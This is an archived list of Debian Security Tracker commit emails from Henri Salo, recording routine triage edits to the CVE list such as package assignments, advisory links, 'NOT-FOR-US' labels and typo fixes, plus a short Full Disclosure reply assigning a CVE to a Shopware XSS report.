[Git][security-tracker-team/security-tracker][master] CVE-2020-1930/spamassassin, CVE-2020-1931/spamassassin

2020-01-30 Thread Henri Salo



Henri Salo pushed to branch master at Debian Security Tracker / security-tracker


Commits:
7734ce22 by Henri Salo at 2020-01-30T10:42:49+02:00
CVE-2020-1930/spamassassin, CVE-2020-1931/spamassassin

- - - - -


1 changed file:

- data/CVE/list


Changes:

=
data/CVE/list
=
@@ -15767,8 +15767,16 @@ CVE-2020-1932 (An information disclosure issue was 
found in Apache Superset 0.34
NOT-FOR-US: Apache Superset
 CVE-2020-1931
RESERVED
+   - spamassassin 
+   NOTE: 
https://svn.apache.org/repos/asf/spamassassin/branches/3.4/build/announcements/3.4.4.txt
+   NOTE: https://www.openwall.com/lists/oss-security/2020/01/30/2
+   TODO: check
 CVE-2020-1930
RESERVED
+   - spamassassin 
+   NOTE: 
https://svn.apache.org/repos/asf/spamassassin/branches/3.4/build/announcements/3.4.4.txt
+   NOTE: https://www.openwall.com/lists/oss-security/2020/01/30/3
+   TODO: check
 CVE-2020-1929 (The Apache Beam MongoDB connector in versions 2.10.0 to 2.16.0 
has an  ...)
TODO: check
 CVE-2020-1928 (An information disclosure vulnerability was found in Apache 
NiFi 1.10. ...)



View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/commit/7734ce22ec68fb31e3a72955020a634994b8b3e8

-- 
View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/commit/7734ce22ec68fb31e3a72955020a634994b8b3e8
You're receiving this email because of your account on salsa.debian.org.


___
debian-security-tracker-commits mailing list
debian-security-tracker-commits@alioth-lists.debian.net
https://alioth-lists.debian.net/cgi-bin/mailman/listinfo/debian-security-tracker-commits

[Git][security-tracker-team/security-tracker][master] CVE-2019-18932/sarg

2020-01-20 Thread Henri Salo



Henri Salo pushed to branch master at Debian Security Tracker / security-tracker


Commits:
66a5c1e2 by Henri Salo at 2020-01-21T08:46:12+02:00
CVE-2019-18932/sarg

- - - - -


1 changed file:

- data/CVE/list


Changes:

=
data/CVE/list
=
@@ -15090,8 +15090,10 @@ CVE-2019-18934 (Unbound 1.6.4 through 1.9.4 contain a 
vulnerability in the ipsec
NOTE: https://nlnetlabs.nl/downloads/unbound/CVE-2019-18934.txt
 CVE-2019-18933 (In Zulip Server versions from 1.7.0 to before 2.0.7, a bug in 
the new  ...)
NOT-FOR-US: Zulip
-CVE-2019-18932
+CVE-2019-18932 [sarg: insecure usage of /tmp/sarg allows privilege escalation 
/ DoS attack vector]
RESERVED
+   - sarg 
+   NOTE: https://www.openwall.com/lists/oss-security/2020/01/20/6
 CVE-2019-18931 (Western Digital My Cloud EX2 Ultra firmware 2.31.195 allows a 
Buffer O ...)
NOT-FOR-US: Western Digital My Cloud EX2 Ultra firmware
 CVE-2019-18930 (Western Digital My Cloud EX2 Ultra firmware 2.31.183 allows 
web users  ...)



View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/commit/66a5c1e251f8fc01e532eaa9f895f0310a6c2943

-- 
View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/commit/66a5c1e251f8fc01e532eaa9f895f0310a6c2943
You're receiving this email because of your account on salsa.debian.org.


___
debian-security-tracker-commits mailing list
debian-security-tracker-commits@alioth-lists.debian.net
https://alioth-lists.debian.net/cgi-bin/mailman/listinfo/debian-security-tracker-commits

[Git][security-tracker-team/security-tracker][master] NFU

2019-11-06 Thread Henri Salo



Henri Salo pushed to branch master at Debian Security Tracker / security-tracker


Commits:
cd8297cc by Henri Salo at 2019-11-06T18:55:04Z
NFU

- - - - -


1 changed file:

- data/CVE/list


Changes:

=
data/CVE/list
=
@@ -13275,8 +13275,10 @@ CVE-2019-15005
RESERVED
 CVE-2019-15004
RESERVED
+   NOT-FOR-US: Atlassian
 CVE-2019-15003
RESERVED
+   NOT-FOR-US: Atlassian
 CVE-2019-15002
RESERVED
 CVE-2019-15001 (The Jira Importers Plugin in Atlassian Jira Server and Data 
Cente from ...)



View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/commit/cd8297cc2a65a337411f867337e19c1b0add4344

-- 
View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/commit/cd8297cc2a65a337411f867337e19c1b0add4344
You're receiving this email because of your account on salsa.debian.org.


___
debian-security-tracker-commits mailing list
debian-security-tracker-commits@alioth-lists.debian.net
https://alioth-lists.debian.net/cgi-bin/mailman/listinfo/debian-security-tracker-commits

[Git][security-tracker-team/security-tracker][master] Fix Typo3 to TYPO3

2019-10-19 Thread Henri Salo



Henri Salo pushed to branch master at Debian Security Tracker / security-tracker


Commits:
d6827f4b by Henri Salo at 2019-10-19T08:58:32Z
Fix Typo3 to TYPO3

- - - - -


1 changed file:

- data/CVE/list


Changes:

=
data/CVE/list
=
@@ -4578,11 +4578,11 @@ CVE-2019-16702 (Integard Pro 2.2.0.9026 allows remote 
attackers to execute arbit
 CVE-2019-16701 (pfSense through 2.3.4 through 2.4.4-p3 allows Remote Code 
Injection vi ...)
NOT-FOR-US: pfSense
 CVE-2019-16700 (The slub_events (aka SLUB: Event Registration) extension 
through 3.0.2 ...)
-   NOT-FOR-US: Typo3 extension
+   NOT-FOR-US: TYPO3 extension
 CVE-2019-16699 (The sr_freecap (aka freeCap CAPTCHA) extension 2.4.5 and below 
and 2.5 ...)
-   NOT-FOR-US: Typo3 extension
+   NOT-FOR-US: TYPO3 extension
 CVE-2019-16698 (The direct_mail (aka Direct Mail) extension through 5.2.2 for 
TYPO3 ha ...)
-   NOT-FOR-US: Typo3 extension
+   NOT-FOR-US: TYPO3 extension
 CVE-2019-16697
RESERVED
 CVE-2019-16696 (phpIPAM 1.4 allows SQL injection via the 
app/admin/custom-fields/edit. ...)
@@ -4614,7 +4614,7 @@ CVE-2019-16684 (An issue was discovered in the 
image-manager in Xoops 2.5.10. Wh
 CVE-2019-16683 (An issue was discovered in the image-manager in Xoops 2.5.10. 
When the ...)
NOT-FOR-US: Xoops
 CVE-2019-16682 (The url_redirect (aka URL redirect) extension through 1.2.1 
for TYPO3  ...)
-   NOT-FOR-US: Typo3 extension
+   NOT-FOR-US: TYPO3 extension
 CVE-2018-21018 (Mastodon before 2.6.3 mishandles timeouts of incompletely 
established  ...)
NOT-FOR-US: Mastodon
 CVE-2019-16681 (The Traveloka application 3.14.0 for Android exports 
com.traveloka.and ...)
@@ -17204,9 +17204,9 @@ CVE-2019-12749 (dbus before 1.10.28, 1.12.x before 
1.12.16, and 1.13.x before 1.
NOTE: https://gitlab.freedesktop.org/dbus/dbus/issues/269
NOTE: 
https://gitlab.freedesktop.org/dbus/dbus/commit/47b1a4c41004bf494b87370987b222c934b19016
 CVE-2019-12748 (TYPO3 8.3.0 through 8.7.26 and 9.0.0 through 9.5.7 allows XSS. 
...)
-   NOT-FOR-US: Typo3
+   NOT-FOR-US: TYPO3
 CVE-2019-12747 (TYPO3 8.x through 8.7.26 and 9.x through 9.5.7 allows 
Deserialization  ...)
-   NOT-FOR-US: Typo3
+   NOT-FOR-US: TYPO3
 CVE-2019-12746 (An issue was discovered in Open Ticket Request System (OTRS) 
Community ...)
{DLA-1877-1}
- otrs2 6.0.20-1
@@ -19490,7 +19490,7 @@ CVE-2019-11833 (fs/ext4/extents.c in the Linux kernel 
through 5.1.2 does not zer
- linux 4.19.37-4
NOTE: Fixed by: 
https://git.kernel.org/linus/592acbf16821288ecdc4192c47e3774a4c48bb64
 CVE-2019-11832 (TYPO3 8.x before 8.7.25 and 9.x before 9.5.6 allows remote 
code execut ...)
-   NOT-FOR-US: Typo3
+   NOT-FOR-US: TYPO3
 CVE-2019-11831 (The PharStreamWrapper (aka phar-stream-wrapper) package 2.x 
before 2.1 ...)
{DSA-4445-1 DLA-1797-1}
- drupal7  (bug #928688)
@@ -140267,7 +140267,7 @@ CVE-2017-6372
 CVE-2017-6371
RESERVED
 CVE-2017-6370 (TYPO3 7.6.15 sends an http request to an 
index.php?loginProvider URI i ...)
-   NOT-FOR-US: Typo3
+   NOT-FOR-US: TYPO3
 CVE-2017-6369 (Insufficient checks in the UDF subsystem in Firebird 2.5.x 
before 2.5. ...)
{DSA-3824-1 DLA-879-1}
- firebird2.5  (bug #858641)
@@ -141456,9 +141456,9 @@ CVE-2017-5965 (The package manager in Sitecore CRM 
8.1 Rev 151207 allows remote
 CVE-2017-5964 (An issue was discovered in Emoncms through 9.8.0. The 
vulnerability ex ...)
NOT-FOR-US: Emoncms
 CVE-2017-5963 (An issue was discovered in caddy (for TYPO3) before 7.2.10. The 
vulner ...)
-   NOT-FOR-US: Typo3 extension
+   NOT-FOR-US: TYPO3 extension
 CVE-2017-5962 (An issue was discovered in contexts_wurfl (for TYPO3) before 
0.4.2. Th ...)
-   NOT-FOR-US: Typo3 extension
+   NOT-FOR-US: TYPO3 extension
 CVE-2017-5961 (An issue was discovered in ionize through 1.0.8. The 
vulnerability exi ...)
NOT-FOR-US: ionize
 CVE-2017-5960 (An issue was discovered in Phalcon Eye through 0.4.1. The 
vulnerabilit ...)
@@ -184171,17 +184171,17 @@ CVE-2015-8765 (Intel McAfee ePolicy Orchestrator 
(ePO) 4.6.9 and earlier, 5.0.x,
 CVE-2015-8761 (The Values module 7.x-1.x before 7.x-1.2 for Drupal does not 
properly  ...)
NOT-FOR-US: Values module for Drupal
 CVE-2015-8760 (The Flvplayer component in TYPO3 6.2.x before 6.2.16 allows 
remote att ...)
-   NOT-FOR-US: Typo3
+   NOT-FOR-US: TYPO3
 CVE-2015-8759 (Cross-site scripting (XSS) vulnerability in the typoLink 
function in T ...)
-   NOT-FOR-US: Typo3
+   NOT-FOR-US: TYPO3
 CVE-2015-8758 (Multiple cross-site scripting (XSS) vulnerabilities in 
unspecified fro ...)
-   NOT-FOR-US: Typo3
+   NOT-FOR-US: TYPO3
 CVE-2015-8757 (Cross-site scripting (XSS) vulnerability in the Extension 
Manager in T ...)
-   NOT-FOR-US: Typo3
+   NOT-FOR-US: TYPO3
 CVE-2015-8756 (Cross

[Git][security-tracker-team/security-tracker][master] Fix minor typos

2019-10-19 Thread Henri Salo



Henri Salo pushed to branch master at Debian Security Tracker / security-tracker


Commits:
8327a5a7 by Henri Salo at 2019-10-19T08:52:16Z
Fix minor typos

- - - - -


1 changed file:

- data/CVE/list


Changes:

=
data/CVE/list
=
@@ -4578,11 +4578,11 @@ CVE-2019-16702 (Integard Pro 2.2.0.9026 allows remote 
attackers to execute arbit
 CVE-2019-16701 (pfSense through 2.3.4 through 2.4.4-p3 allows Remote Code 
Injection vi ...)
NOT-FOR-US: pfSense
 CVE-2019-16700 (The slub_events (aka SLUB: Event Registration) extension 
through 3.0.2 ...)
-   NOT-FOR-US: Typo3 extenstion
+   NOT-FOR-US: Typo3 extension
 CVE-2019-16699 (The sr_freecap (aka freeCap CAPTCHA) extension 2.4.5 and below 
and 2.5 ...)
-   NOT-FOR-US: Typo3 extenstion
+   NOT-FOR-US: Typo3 extension
 CVE-2019-16698 (The direct_mail (aka Direct Mail) extension through 5.2.2 for 
TYPO3 ha ...)
-   NOT-FOR-US: Typo3 extenstion
+   NOT-FOR-US: Typo3 extension
 CVE-2019-16697
RESERVED
 CVE-2019-16696 (phpIPAM 1.4 allows SQL injection via the 
app/admin/custom-fields/edit. ...)



View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/commit/8327a5a7904fcb5d64234cb80f0ca785d4d1c063

-- 
View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/commit/8327a5a7904fcb5d64234cb80f0ca785d4d1c063
You're receiving this email because of your account on salsa.debian.org.


___
debian-security-tracker-commits mailing list
debian-security-tracker-commits@alioth-lists.debian.net
https://alioth-lists.debian.net/cgi-bin/mailman/listinfo/debian-security-tracker-commits

[Git][security-tracker-team/security-tracker][master] Fix NOTE

2019-10-07 Thread Henri Salo



Henri Salo pushed to branch master at Debian Security Tracker / security-tracker


Commits:
328d8046 by Henri Salo at 2019-10-07T17:28:22Z
Fix NOTE

- - - - -


1 changed file:

- data/CVE/list


Changes:

=
data/CVE/list
=
@@ -14803,8 +14803,9 @@ CVE-2019-12401 (Solr versions 1.3.0 to 1.4.1, 3.1.0 to 
3.6.2 and 4.0.0 to 4.10.4
NOTE: https://www.openwall.com/lists/oss-security/2019/09/10/1
NOTE: Upstream's fix (upgrading dependencies) suggests the issue is in 
libwoodstox-java:
NOTE: https://issues.apache.org/jira/browse/SOLR-6830
-   NOTE: May be related to the change in the 4.x series of 
libwoodstox-java to disabling coalescing by default which can trigger large 
memory consumption
-   when parsing specially crafted XML data
+   NOTE: May be related to the change in the 4.x series of 
libwoodstox-java to
+   NOTE:   disabling coalescing by default which can trigger large memory 
consumption
+   NOTE:   when parsing specially crafted XML data
 CVE-2019-12400 (In version 2.0.3 Apache Santuario XML Security for Java, a 
caching mec ...)
- libxml-security-java  (bug #935548)
[stretch] - libxml-security-java  (Vulnerable code 
introduced in 2.0.3)



View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/commit/328d80462b0ddfc431d59ecd84c75573dd48c586

-- 
View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/commit/328d80462b0ddfc431d59ecd84c75573dd48c586
You're receiving this email because of your account on salsa.debian.org.


___
debian-security-tracker-commits mailing list
debian-security-tracker-commits@alioth-lists.debian.net
https://alioth-lists.debian.net/cgi-bin/mailman/listinfo/debian-security-tracker-commits

[Git][security-tracker-team/security-tracker][master] References for exiv2 vulns

2019-09-25 Thread Henri Salo



Henri Salo pushed to branch master at Debian Security Tracker / security-tracker


Commits:
43c8c054 by Henri Salo at 2019-09-25T06:09:30Z
References for exiv2 vulns

- - - - -


1 changed file:

- data/CVE/list


Changes:

=
data/CVE/list
=
@@ -7319,8 +7319,12 @@ CVE-2019-14371 (An issue was discovered in Libav 12.3. 
There is an infinite loop
- libav 
NOTE: https://bugzilla.libav.org/show_bug.cgi?id=1163
 CVE-2019-14370 (In Exiv2 0.27.99.0, there is an out-of-bounds read in 
Exiv2::MrwImage: ...)
+   - exiv2 
+   NOTE: https://github.com/Exiv2/exiv2/issues/954
TODO: check
 CVE-2019-14369 (Exiv2::PngImage::readMetadata() in pngimage.cpp in Exiv2 
0.27.99.0 all ...)
+   - exiv2 
+   NOTE: https://github.com/Exiv2/exiv2/issues/953
TODO: check
 CVE-2019-14368 (Exiv2 0.27.99.0 has a heap-based buffer over-read in 
Exiv2::RafImage:: ...)
TODO: check



View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/commit/43c8c0544697abf317812b9da94557abe0b6045b

-- 
View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/commit/43c8c0544697abf317812b9da94557abe0b6045b
You're receiving this email because of your account on salsa.debian.org.


___
debian-security-tracker-commits mailing list
debian-security-tracker-commits@alioth-lists.debian.net
https://alioth-lists.debian.net/cgi-bin/mailman/listinfo/debian-security-tracker-commits

[Git][security-tracker-team/security-tracker][master] Cleanup one REJECTED entry

2019-09-22 Thread Henri Salo



Henri Salo pushed to branch master at Debian Security Tracker / security-tracker


Commits:
f8635dab by Henri Salo at 2019-09-22T08:23:55Z
Cleanup one REJECTED entry

- - - - -


1 changed file:

- data/CVE/list


Changes:

=
data/CVE/list
=
@@ -15500,7 +15500,6 @@ CVE-2019-11564 (A cross-site scripting (XSS) 
vulnerability in HumHub 1.3.12 allo
NOT-FOR-US: HumHub
 CVE-2019-11563
REJECTED
-   NOT-FOR-US: Shenzhen Sricctv DeviceViewer for XP
 CVE-2019-11562
RESERVED
 CVE-2019-11561 (The Chuango 433 MHz burglar-alarm product line is vulnerable 
to a Deni ...)



View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/commit/f8635dabc80c000f74297c085c5f0493b7eeffa3

-- 
View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/commit/f8635dabc80c000f74297c085c5f0493b7eeffa3
You're receiving this email because of your account on salsa.debian.org.


___
debian-security-tracker-commits mailing list
debian-security-tracker-commits@alioth-lists.debian.net
https://alioth-lists.debian.net/cgi-bin/mailman/listinfo/debian-security-tracker-commits

[Git][security-tracker-team/security-tracker][master] NFU

2019-09-22 Thread Henri Salo



Henri Salo pushed to branch master at Debian Security Tracker / security-tracker


Commits:
78443754 by Henri Salo at 2019-09-22T08:22:58Z
NFU

- - - - -


1 changed file:

- data/CVE/list


Changes:

=
data/CVE/list
=
@@ -3,9 +3,9 @@ CVE-2019-16681 (The Traveloka application 3.14.0 for Android 
exports com.travelo
 CVE-2019-16680 (An issue was discovered in GNOME file-roller before 3.29.91. 
It allows ...)
TODO: check
 CVE-2019-16679 (Gila CMS before 1.11.1 allows admin/fm/?f=../ directory 
traversal, lea ...)
-   TODO: check
+   NOT-FOR-US: Gila CMS
 CVE-2019-16678 (admin/urlrule/add.html in YzmCMS 5.3 allows CSRF with a 
resultant deni ...)
-   TODO: check
+   NOT-FOR-US: YzmCMS
 CVE-2019-16677 (An issue was discovered in idreamsoft iCMS V7.0. 
admincp.php?app=membe ...)
TODO: check
 CVE-2019-16676



View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/commit/784437543ffa50bbf2fe524771c7702d534a7a93

-- 
View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/commit/784437543ffa50bbf2fe524771c7702d534a7a93
You're receiving this email because of your account on salsa.debian.org.


___
debian-security-tracker-commits mailing list
debian-security-tracker-commits@alioth-lists.debian.net
https://alioth-lists.debian.net/cgi-bin/mailman/listinfo/debian-security-tracker-commits

[Git][security-tracker-team/security-tracker][master] NFU

2019-07-23 Thread Henri Salo



Henri Salo pushed to branch master at Debian Security Tracker / security-tracker


Commits:
b75e6e15 by Henri Salo at 2019-07-23T20:17:56Z
NFU

- - - - -


1 changed file:

- data/CVE/list


Changes:

=
data/CVE/list
=
@@ -2389,7 +2389,7 @@ CVE-2019-13572
 CVE-2019-13571
RESERVED
 CVE-2019-13570 (The AJdG AdRotate plugin before 5.3 for WordPress allows SQL 
Injection ...)
-   TODO: check
+   NOT-FOR-US: WordPress plugin AJdG AdRotate
 CVE-2019-13569 (A SQL injection vulnerability exists in the Icegram Email 
Subscribers  ...)
NOT-FOR-US: Icegram Email Subscribers & Newsletters plugin for WordPress
 CVE-2019-13568



View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/commit/b75e6e15633b62a22c07a32a744fd28386232c76

-- 
View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/commit/b75e6e15633b62a22c07a32a744fd28386232c76
You're receiving this email because of your account on salsa.debian.org.


___
debian-security-tracker-commits mailing list
debian-security-tracker-commits@alioth-lists.debian.net
https://alioth-lists.debian.net/cgi-bin/mailman/listinfo/debian-security-tracker-commits

Re: [FD] Multiple Cross-site Scripting Vulnerabilities in Shopware 5.5.6

2019-06-24 Thread Henri Salo

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

On Fri, May 31, 2019 at 10:48:05AM +0200, Daniel Bishtawi wrote:
> Netsparker Advisory Reference: NS-19-004

Please use CVE-2019-12935 for this vulnerability.

- -- 
Henri Salo
-BEGIN PGP SIGNATURE-

iQIzBAEBCAAdFiEE/aVSDznAZReWTkxKJ633pE6qdXQFAl0QcMUACgkQJ633pE6q
dXSKkA/+PT6Itfpm1o2EA66OiSDUinWJmuYTExFeb6nnQepcNNynBJiYypeCNOYW
iViSKfbmuAJSyKKX/9YtVfcKKgGP4+YTry78PYW5N3yZh1ROiP9fKkTtfAwkMAOG
xwKXWG+/nMiqL9WBgfCC7jeoacckuLfhT32ejEYpfw+r+8ts1e8sULkaGRqx27Hp
LiVuM++G1lFnm1z0A1+KBFirZIxeD8uHBrc8PIoeW8Mv1KPLeBsXdV2Yjfz6YX+i
IAdv7PjYiTRsyaYirJdNYJcln8Atu1cD8B1hrF4vXB5VgHERY3P9ifFQ1uBhOqyY
Alinzj/jzaSzfayEOcUcDWJuGpRXjCh3j0prhZMdWuhO5nS8WrgYwQawWSp1SIor
LfNh/hQ45Aj1PGa6F+n7MHqsf7TQcPJvrOUhJ47mDOSMxSFMDrNowpXG6jpkXnBG
4hsL/2SuC/77iFWxP1nLzTOlJTwAcIQwfNEViPe0Bq6yhwLXOp97tRR+HhoCxMmF
V1OjuL9lfpX9QZ+9FYx9lMbAQw2kw9fAH+Gleg5PfNKwmGubGBJ5X4ilJ2488Ueq
nQwzaVDARmL4F1f0LrnNAyP/PNNj6UsktePd6gSqhltInKCwdJy8LKNvCmRt//As
XdC1uDuxbvmwCrDGMltWvABuzBvjXmi2olWiNIdYpDMmC9owpHU=
=zbnp
-END PGP SIGNATURE-

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[Git][security-tracker-team/security-tracker][master] NFU

2019-06-24 Thread Henri Salo



Henri Salo pushed to branch master at Debian Security Tracker / security-tracker


Commits:
940c3cb7 by Henri Salo at 2019-06-24T06:39:17Z
NFU

- - - - -


1 changed file:

- data/CVE/list


Changes:

=
data/CVE/list
=
@@ -1,3 +1,5 @@
+CVE-2019-12935
+   NOT-FOR-US: Shopware
 CVE-2019-12933 (An XSS issue on the PIX-Link Repeater/Router LV-WR09 with 
firmware v28 ...)
NOT-FOR-US: PIX-Link Repeater/Router LV-WR09
 CVE-2019-12932



View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/commit/940c3cb7d36f863e8a273c1441bd57c87765ef87

-- 
View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/commit/940c3cb7d36f863e8a273c1441bd57c87765ef87
You're receiving this email because of your account on salsa.debian.org.


___
debian-security-tracker-commits mailing list
debian-security-tracker-commits@alioth-lists.debian.net
https://alioth-lists.debian.net/cgi-bin/mailman/listinfo/debian-security-tracker-commits

[Git][security-tracker-team/security-tracker][master] NFU

2019-06-06 Thread Henri Salo



Henri Salo pushed to branch master at Debian Security Tracker / security-tracker


Commits:
213a65a3 by Henri Salo at 2019-06-06T08:26:58Z
NFU

- - - - -


1 changed file:

- data/CVE/list


Changes:

=
data/CVE/list
=
@@ -21411,7 +21411,7 @@ CVE-2019-4222 (IBM Sterling B2B Integrator Standard 
Edition 6.0.0.0 and 6.0.0.1
 CVE-2019-4221
RESERVED
 CVE-2019-4220 (IBM InfoSphere Information Server 11.7.1.0 stores a common hard 
coded  ...)
-   TODO: check
+   NOT-FOR-US: IBM
 CVE-2019-4219
RESERVED
 CVE-2019-4218
@@ -21449,7 +21449,7 @@ CVE-2019-4203 (IBM API Connect 5.0.0.0 and 5.0.8.6 
Developer Portal can be explo
 CVE-2019-4202 (IBM API Connect 5.0.0.0 and 5.0.8.6 Developer Portal is 
vulnerable to  ...)
NOT-FOR-US: IBM
 CVE-2019-4201 (IBM Jazz for Service Management 1.1.3, 1.1.3.1, and 1.1.3.2 
could allo ...)
-   TODO: check
+   NOT-FOR-US: IBM
 CVE-2019-4200
RESERVED
 CVE-2019-4199
@@ -21739,7 +21739,7 @@ CVE-2019-4058 (IBM BigFix Platform 9.2 and 9.5 could 
allow a low-privilege user
 CVE-2019-4057
RESERVED
 CVE-2019-4056 (IBM Maximo Asset Management 7.6 Work Centers' application does 
not val ...)
-   TODO: check
+   NOT-FOR-US: IBM Maximo Asset Management
 CVE-2019-4055 (IBM MQ 8.0.0.0 through 8.0.0.10, 9.0.0.0 through 9.0.0.5, and 
9.1.0.0  ...)
NOT-FOR-US: IBM
 CVE-2019-4054
@@ -21755,7 +21755,7 @@ CVE-2019-4050
 CVE-2019-4049
RESERVED
 CVE-2019-4048 (IBM Maximo Asset Management 7.6 could allow a physical user of 
the sys ...)
-   TODO: check
+   NOT-FOR-US: IBM Maximo Asset Management
 CVE-2019-4047 (IBM Jazz Reporting Service (JRS) 6.0.6 could allow an 
authenticated us ...)
NOT-FOR-US: IBM
 CVE-2019-4046 (IBM WebSphere Application Server 7.0, 8.0, 8.5, and 9.0 is 
vulnerable  ...)
@@ -81848,7 +81848,7 @@ CVE-2018-2030
 CVE-2018-2029
RESERVED
 CVE-2018-2028 (IBM Maximo Asset Management 7.6 could allow a an authenticated 
user to ...)
-   TODO: check
+   NOT-FOR-US: IBM Maximo Asset Management
 CVE-2018-2027
RESERVED
 CVE-2018-2026 (IBM Financial Transaction Manager 3.2.1 for Digital Payments 
could all ...)



View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/commit/213a65a32ab2e5594ef699153ff4a96282128d69

-- 
View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/commit/213a65a32ab2e5594ef699153ff4a96282128d69
You're receiving this email because of your account on salsa.debian.org.

___
debian-security-tracker-commits mailing list
debian-security-tracker-commits@alioth-lists.debian.net
https://alioth-lists.debian.net/cgi-bin/mailman/listinfo/debian-security-tracker-commits

[Git][security-tracker-team/security-tracker][master] CVE-2019-12360/xpdf

2019-06-06 Thread Henri Salo



Henri Salo pushed to branch master at Debian Security Tracker / security-tracker


Commits:
b4551eb3 by Henri Salo at 2019-06-06T08:24:36Z
CVE-2019-12360/xpdf

- - - - -


1 changed file:

- data/CVE/list


Changes:

=
data/CVE/list
=
@@ -850,6 +850,8 @@ CVE-2019-12362 (EmpireCMS 7.5.0 has XSS via the HTTP 
Referer header to e/member/
 CVE-2019-12361 (EmpireCMS 7.5.0 has XSS via the from parameter to 
e/member/doaction.ph ...)
NOT-FOR-US: EmpireCMS
 CVE-2019-12360 (A stack-based buffer over-read exists in 
FoFiTrueType::dumpString in f ...)
+   - xpdf 
+   NOTE: https://forum.xpdfreader.com/viewtopic.php?f=3=41801
TODO: check
 CVE-2019-12359
RESERVED



View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/commit/b4551eb3186112be1096eb386a3829af44168aa0

-- 
View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/commit/b4551eb3186112be1096eb386a3829af44168aa0
You're receiving this email because of your account on salsa.debian.org.

___
debian-security-tracker-commits mailing list
debian-security-tracker-commits@alioth-lists.debian.net
https://alioth-lists.debian.net/cgi-bin/mailman/listinfo/debian-security-tracker-commits

[Git][security-tracker-team/security-tracker][master] NFU

2019-06-06 Thread Henri Salo



Henri Salo pushed to branch master at Debian Security Tracker / security-tracker


Commits:
fbd4f08c by Henri Salo at 2019-06-06T08:18:40Z
NFU

- - - - -


1 changed file:

- data/CVE/list


Changes:

=
data/CVE/list
=
@@ -663,7 +663,7 @@ CVE-2019-12441 [Protected Branches Restriction Rules Bypass]
- gitlab  (bug #930004)
NOTE: 
https://about.gitlab.com/2019/06/03/security-release-gitlab-11-dot-11-dot-1-released/
 CVE-2019-12440 (The Sitecore Rocks plugin before 2.1.149 for Sitecore allows 
an unauth ...)
-   TODO: check
+   NOT-FOR-US: Sitecore CMS
 CVE-2019-12438
RESERVED
 CVE-2019-12437
@@ -7635,7 +7635,7 @@ CVE-2019-9877 (There is an invalid memory access 
vulnerability in the function T
 CVE-2019-9876
RESERVED
 CVE-2019-9875 (Deserialization of Untrusted Data in the anti CSRF module in 
Sitecore  ...)
-   TODO: check
+   NOT-FOR-US: Sitecore CMS
 CVE-2019-9874 (Deserialization of Untrusted Data in the 
Sitecore.Security.AntiCSRF (a ...)
NOT-FOR-US: Sitecore CMS
 CVE-2019-9873



View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/commit/fbd4f08ce932b1dcda34014062d6395865ae4f3f

-- 
View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/commit/fbd4f08ce932b1dcda34014062d6395865ae4f3f
You're receiving this email because of your account on salsa.debian.org.

___
debian-security-tracker-commits mailing list
debian-security-tracker-commits@alioth-lists.debian.net
https://alioth-lists.debian.net/cgi-bin/mailman/listinfo/debian-security-tracker-commits

1 2 3 4 5 6 7 8 9 10 >

1 - 100 of 2740 matches

Mail list logo